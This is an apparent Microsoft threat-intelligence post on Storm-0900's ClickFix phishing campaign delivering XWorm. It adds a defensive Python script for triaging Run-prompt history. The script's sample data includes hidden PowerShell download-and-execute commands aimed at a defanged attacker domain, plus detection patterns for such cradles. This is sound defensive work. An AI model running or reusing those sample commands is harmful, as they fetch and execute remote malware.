On Thanksgiving eve, Microsoft detected and disrupted a sophisticated phishing campaign from Storm-0900 targeting tens of thousands of U.S. users. The attack used timely themes (parking tickets, medical results, holiday references) to exploit trust and urgency. Check out the post below to explore:
➡️ What made this campaign notable
➡️ The business impact
➡️ What protected our customers
➡️ Recommended actions for organizations
#ThreatIntelligence
On Thanksgiving eve, November 26, Microsoft detected and blocked a high-volume phishing campaign from a threat actor we track as Storm-0900. The campaign used parking ticket and medical test result themes and referenced Thanksgiving to lend credibility and lower recipients' suspicion. It consisted of tens of thousands of emails and primarily targeted users in the United States. Microsoft disrupted the campaign through a combination of email filtering, endpoint protections, and threat intelligence-based preemptive blocking of attacker infrastructure.

The URLs in the phishing emails redirected to an attacker-controlled landing page on the malicious domain permit-service[.]top, which required several rounds of user interaction. First, users had to solve a slider CAPTCHA by clicking and dragging a slider. They were then presented with a ClickFix lure, a technique threat actors use to trick users into running malicious commands on their own devices. If a user fell for the lure and executed the command in the Run prompt, a PowerShell script ran.

Like similar Storm-0900 activity, this campaign led to XWorm, a popular modular malware used by many threat actors for remote access, deployment of additional malware, and data theft. XWorm uses plugins that threat actors can use to perform various tasks on compromised devices, and these plugins have evolved over the years. The latest XWorm version includes a plugin for encrypting files, giving the malware ransomware capability, although we have not observed this plugin being used in attacks.

Storm-0900 is a prolific threat actor that, when active, launches phishing campaigns every week and abuses many popular brands in its emails. In addition to the parking ticket and medical test result lures, this campaign used emails purporting to be from a health care company and a government health agency.
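The ClickFix step described above leaves a durable host artifact: whatever the user pastes into the Run prompt (Win+R) is recorded under HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\RunMRU, one string value per command with a trailing "\1" marker and an MRUList value giving the most-recent-first order. The following Python script is an added example by the editor, not code from the Microsoft post or from Storm-0900 tooling. It parses an exported copy of that key, decodes any PowerShell -EncodedCommand argument (base64 of UTF-16LE) so the real payload can be inspected, and flags entries that combine a launcher with hidden-window, policy-bypass, download-cradle or encoded-payload indicators. The indicator list is the editor's own; the sample RunMRU contents are constructed, the URL paths under permit-service[.]top are invented, and the "I am not a robot" trailing-comment pattern is one commonly seen in ClickFix lures in general rather than something the post states for this campaign.

```python
"""Triage Windows Run-prompt (Win+R) history for ClickFix-style commands.

Windows stores Run-dialog history under
HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\RunMRU:
each command is a string value named a, b, c, ... ending in a "\\1" marker,
and the MRUList value lists those letters most-recent first. This script works
on an exported copy of that key (a dict of value name -> data). All indicators
and sample data below are the editor's own construction, not campaign artifacts.
"""
import base64
import re
from typing import Dict, List, Optional, Tuple

# Behavioral indicators, checked against the raw command plus (if present) the
# decoded -EncodedCommand payload. "launcher" alone never makes an entry suspicious.
INDICATORS = {
    "launcher": re.compile(r"\b(?:powershell|pwsh|cmd|mshta|wscript|cscript|rundll32|regsvr32)\b", re.I),
    "hidden_window": re.compile(r"-w(?:indowstyle)?\s+hidden", re.I),
    "bypass_or_nop": re.compile(r"-(?:ep|executionpolicy)\s+bypass|-nop\b|-noprofile\b", re.I),
    "encoded_command": re.compile(r"-e(?:c|n|nc|ncodedcommand)?\s+[A-Za-z0-9+/=]{16,}", re.I),
    "invoke_expression": re.compile(r"\biex\b|invoke-expression", re.I),
    "web_download": re.compile(r"\birm\b|\biwr\b|invoke-restmethod|invoke-webrequest|downloadstring|downloadfile|net\.webclient", re.I),
    "lolbin_fetch": re.compile(r"\b(?:mshta|curl|bitsadmin|certutil|msiexec)\b.*(?:https?://|\\\\)", re.I),
    "remote_url": re.compile(r"https?://", re.I),
    # Trailing comment posing as a human-verification string (common ClickFix pattern).
    "verification_lure": re.compile(r"#.*(?:robot|verif|captcha)", re.I),
}
ENCODED_RE = re.compile(r"-e(?:c|n|nc|ncodedcommand)?\s+([A-Za-z0-9+/=]+)", re.I)


def _b64_utf16(s: str) -> str:
    """Encode text the way PowerShell expects for -EncodedCommand (UTF-16LE, base64)."""
    return base64.b64encode(s.encode("utf-16-le")).decode("ascii")


# Constructed sample of an exported RunMRU key (hypothetical data, not from a real host).
SAMPLE_RUNMRU = {
    "MRUList": "dcba",
    "a": r"notepad\1",
    "b": r"cmd\1",
    "c": r'powershell -w hidden -nop -c "iex (irm http://permit-service[.]top/verify)" # "I am not a robot - Verification ID: 7391"\1',
    "d": "powershell -nop -enc " + _b64_utf16("iex (irm http://permit-service[.]top/v)") + r"\1",
}


def parse_runmru(values: Dict[str, str]) -> List[Tuple[str, str]]:
    """Return (value_name, command) pairs, most recent first, with the "\\1" marker removed."""
    order = values.get("MRUList", "")
    # Letters missing from MRUList are still worth reviewing; append them after the ordered ones.
    names = list(order) + sorted(k for k in values if len(k) == 1 and k not in order)
    pairs = []
    for name in names:
        raw = values.get(name)
        if raw is None:
            continue
        pairs.append((name, raw[:-2] if raw.endswith("\\1") else raw))
    return pairs


def decode_encoded_command(cmd: str) -> Optional[str]:
    """Decode a PowerShell -EncodedCommand argument (base64 of UTF-16LE), or None if absent/invalid."""
    m = ENCODED_RE.search(cmd)
    if not m:
        return None
    try:
        return base64.b64decode(m.group(1), validate=True).decode("utf-16-le")
    except (ValueError, UnicodeDecodeError):
        return None


def triage_runmru(values: Dict[str, str]) -> List[dict]:
    """Score each Run-prompt entry; suspicious means two or more indicators beyond the launcher."""
    rows = []
    for name, cmd in parse_runmru(values):
        decoded = decode_encoded_command(cmd)
        haystack = cmd if decoded is None else cmd + "\n" + decoded
        hits = sorted(k for k, rx in INDICATORS.items() if rx.search(haystack))
        score = len([h for h in hits if h != "launcher"])
        rows.append({"value": name, "command": cmd, "decoded": decoded,
                     "indicators": hits, "suspicious": score >= 2})
    return rows


if __name__ == "__main__":
    for row in triage_runmru(SAMPLE_RUNMRU):
        flag = "SUSPICIOUS" if row["suspicious"] else "ok"
        print(f"[{flag}] {row['value']}: {row['command'][:70]}")
        if row["decoded"]:
            print(f"    decoded: {row['decoded']}")
        if row["indicators"]:
            print(f"    indicators: {', '.join(row['indicators'])}")
```

On a live host the key can be exported per user with `reg export` (or read with PowerShell's Get-ItemProperty) and fed to triage_runmru; the decoding step matters because an -EncodedCommand entry shows no URL or cmdlet names until the UTF-16LE payload is recovered. Pair the registry review with process-creation telemetry for explorer.exe spawning powershell.exe, since the RunMRU entry proves the command was typed but not that the download succeeded.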
Microsoft recommends continuously raising user awareness of phishing campaigns, including through attack simulation training. In addition to blocking the phishing emails through email filtering and preemptive blocking of infrastructure, Microsoft Defender detects the XWorm malware, its malicious connections, and follow-on malicious behavior. This campaign underscores the importance of early detection and blocking of malicious activity in disrupting multi-stage attacks and stopping threat actors from performing follow-on actions.